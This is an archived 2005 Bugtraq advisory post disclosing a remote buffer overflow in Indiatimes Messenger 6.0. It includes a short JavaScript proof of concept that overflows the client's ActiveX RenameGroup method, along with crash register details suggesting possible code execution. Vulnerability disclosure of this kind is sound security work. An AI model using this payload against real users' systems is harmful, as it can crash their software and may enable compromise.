lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 31 Aug 2005 13:44:12 +0100 (BST) From: ViPeR <viper31337@...oo.co.in> To: bugtraq@...urityfocus.com Subject: Indiatimes Messenger 6.0 Buffer Overflow (Remote) Indiatimes Messenger 6.0 Buffer Overflow (Remote) Vulnerable Program : Indiatimes Messenger v6.0 (Latest) Vendor URL : http://messenger.indiatimes.com/ (Attempt to contact thru http://messenger.indiatimes.com/feedback.htm failed!) Exploit Type : Remote DoS (Remote Compromise may also be possible) Discovered by : Gregory R. Panakkal Proof Of Concept: [script] var obj1 = new ActiveXObject("MMClient.MunduMessenger.1"); var buf = ""; for(i=0; i<1000; i++) { buf += "A"; } while(obj1.GetServerStatus() != "Logged In"); //wait till login obj1.RenameGroup("Friends", buf, 5); [/script] The program (MMClient.exe) crashes @ 004B681B 8979 04 mov dword ptr ds:[ecx+4],edi with registers ecx, and edi = 0x41414141 [controllable] So, remote compromise maybe possible (not confirmed). rgds, Gregory R. Panakkal http://www.infogreg.com __________________________________________________________ Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
Powered by blists - more mailing lists